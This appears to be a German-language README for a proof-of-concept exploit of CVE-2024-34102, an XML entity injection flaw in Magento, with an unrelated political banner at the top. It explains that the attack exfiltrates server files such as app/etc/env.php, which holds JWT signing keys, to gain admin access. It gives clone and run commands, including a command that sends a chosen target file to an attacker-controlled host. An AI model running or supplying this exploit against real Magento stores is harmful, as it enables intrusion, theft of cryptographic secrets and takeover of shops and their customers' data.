
Eine PoC-Demonstration , kritische XML-Entity-Injection-Sicherheitslücke in Magento
Wir fordern die sichere Rückkehr aller Bürger, die von der terroristischen Gruppe Hamas als Geiseln genommen wurden. Wir werden nicht ruhen, bis jede Geisel freigelassen ist und sicher nach Hause zurückkehrt. Sie können helfen, sie nach Hause zu bringen. https://stories.bringthemhomenow.net/
Dieses Repository enthält einen Proof-of-Concept (PoC) Exploit für die kritische XML-Entity-Injection-Schwachstelle (CVE-2024-34102) in Magento. Diese Schwachstelle ermöglicht die Exfiltration sensibler Dateien, die dann genutzt werden können, um unbefugten Zugriff auf die administrativen Funktionen von Magento zu erlangen. Dieser Exploit ist für Bildungszwecke gedacht und sollte verantwortungsvoll eingesetzt werden.
Magento ist eine der weltweit am häufigsten genutzten E-Commerce-Lösungen. Im Juni 2024 wurde eine kritische Pre-Authentication-XML-Entity-Injection entdeckt, die als CVE-2024-34102 identifiziert wurde. Diese Schwachstelle kann schwerwiegende Folgen haben, darunter die Exfiltration der Datei app/etc/env.php aus Magento, die kryptografische Schlüssel zum Signieren von JWTs enthält.
requests-Bibliothek (pip install requests)Repository klonen:
git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
cd CVE-2024-34102-exploit
Skript mit den erforderlichen Argumenten ausführen:
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
--target-url: Die URL der Ziel-Magento-Instanz.--target-file: Der Dateipfad auf dem Zielserver, der exfiltriert werden soll.--exfil-url: Die URL zum Empfang der exfiltrierten Daten.python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999